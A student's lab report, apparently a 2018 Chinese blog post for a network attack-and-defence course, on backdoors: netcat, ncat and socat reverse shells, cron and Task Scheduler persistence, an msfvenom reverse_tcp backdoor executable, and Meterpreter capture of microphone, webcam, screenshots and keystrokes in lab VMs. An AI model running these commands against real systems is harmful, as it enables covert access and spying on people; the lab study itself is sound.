20155229《网络对抗技术》Exp2:后门原理与实践

实验预习

  • 后门: 指绕过安全控制而获取对程序或系统访问权的方法。最主要目的就是方便以后再次秘密进入或者控制系统。
  • 木马与后门的区别:
    • 木马:通过欺骗用户的方法(包含捆绑,利用网页等)让用户不知不觉的安装到系统中的一类软件,主要功能有远程控制,盗密码等,具有欺骗性。
    • 区别:后门和木马的区别就是它更注重隐蔽性但是没有欺骗性,因此它的危害性没有木马大。

实验内容

常用后门工具

ncat: netcat能通过TCP和UDP在网络中读写数据,通过与其他工具结合和重定向。

  • 端口扫描:

    • Win获得Linux Shell

      a. 在win下查看IP地址

      b. 使用ncat.exe程序监听本机的5229端口

      c. 在Kali下,使用nc -e命令反弹连接Win的5229端口

      d. win下获得一个linux shell,可运行任何指令,如ls

    • Linux获得Win Shell

      a. 查看kali的IP

      b. kali中使用nc指令监听5229端口

      c. 在Win下,使用ncat.exe -e命令选项反弹连接Kali主机的5229端口

      d. kali下看到Win的命令提示

  • 数据传输:

    • Win下监听5229端口
    • Kali下连接到Win的5229端口

  • 文件传输:

    • 在win中打开监听,在kali中发送文件


Meterpreter

1.使用netcat获取主机操作Shell,cron启动

crontab: 用来让使用者在固定时间或固定间隔执行程序的指令。

参数:
-e [UserName]: 执行文字编辑器来设定时程表,内定的文字编辑器是 VI,如果你想用别的文字编辑器,则请先设定 VISUAL 环境变数来指定使用那个文字编辑器(比如说 setenv VISUAL joe)
-r [UserName]: 删除目前的时程表
-l [UserName]: 列出目前的时程表
-v [UserName]:列出用户cron作业的状态

  • Win下,监听5229端口

  • crontab -e指令编辑定时任务

  • 在最后一行添加&& * * * * /bin/netcat 192.168.126.129 5229 -e /bin/sh,意思是在每个小时的第&&分钟反向连接Win主机的5229端口

  • 当时间到了&&时,此时已经获得了Kali的shell

2.使用socat获取主机操作Shell, 任务计划启动

socat: 可以看做netcat的加强版。

  • Win->控制面板->管理工具->任务计划程序

    • 新建任务计划

      1 .触发器:当锁定任何用户的工作站时

      2 .操作->程序或脚本:c:\ncat\ncat.exe

      3 .操作->添加参数:
      tcp-listen:5229 exec:cmd.exe,pty,stderr
      将cmd.exe绑定到端口5229,同时把cmd.exe的stderr重定
      向到stdout上

      4 .运行新建的任务

      5 .在Kali环境下输入指令socat - tcp:192.168.126.129:5229,此时已经成功获得了一个cmd shell

3.使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

  • 创建后门文件

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.126.128 LPORT=5229 -f exe > 20155229_backdoor.exe

  • nc指令将后门程序传送到Win:

  • Kali中使用msfconsole指令进入msf控制台,打开监听进程,设置payload,设置反弹回连的IP和端口:


其实我没太懂为什么输入msfconsole命令后会出现类似下图《小马宝丽》动画片里的生物,可能是设计者有一颗少女心(童心)吧。。。囧

  • 进行监听

  • 运行win中的后门程序

4.使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

  • record_mic指令可以截获一段音频

  • webcam_snap指令可以使用摄像头进行拍照


  • screenshot指令可以进行截屏:

  • keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录

基础问题问答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

  • 后门在软件开发过程中被引入,发布室被忽视,在下载该软件时,自动的被安装在主机中。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

  • win:新建任务触发器
  • linux:cron定时触发

(3)Meterpreter有哪些给你映像深刻的功能?

  • 能够捕获音频,利用摄像头拍照等一些列能够获取我们隐私的操作。(可以说是日常恐慌了。。。)

(4)如何发现自己有系统有没有被安装后门?

  • 可以使用一些杀毒软件对主机进行查杀;对防火墙、端口等设施进行检查。

实验中遇到的问题及解决

问题一:输入webcam_snap之后出现以下错误提示

想起自己使用的是虚拟机win7进行的实验,所以在win7中设备查找是否有图像设备,答案是没有。然后将电脑上的摄像头连接到虚拟机中。再次执行webcam_snap该命令,虚拟机能够进行拍照。

实验总结与体会

本次实验在开始做之前先了解了一些相关的知识,看起来有些枯燥,但开始动手做实验后,发现了本次实验的魅力,尤其是看到了“小马宝丽”还有录音、拍照、读取击键的记录等结果后,但也觉得能够看到别人在做什么,反想到我们现在在电脑上的一举一动可能也被别人监视着就很恐慌。所以这次实验也给我提了一个很大的醒,哪怕是百度过关的软件,那也不能下载,因为不知道那上面会不会有隐藏的后门、木马等附在软件中。

posted @ 2018-04-01 16:04  Fer_佳  阅读(464)  评论(0编辑  收藏  举报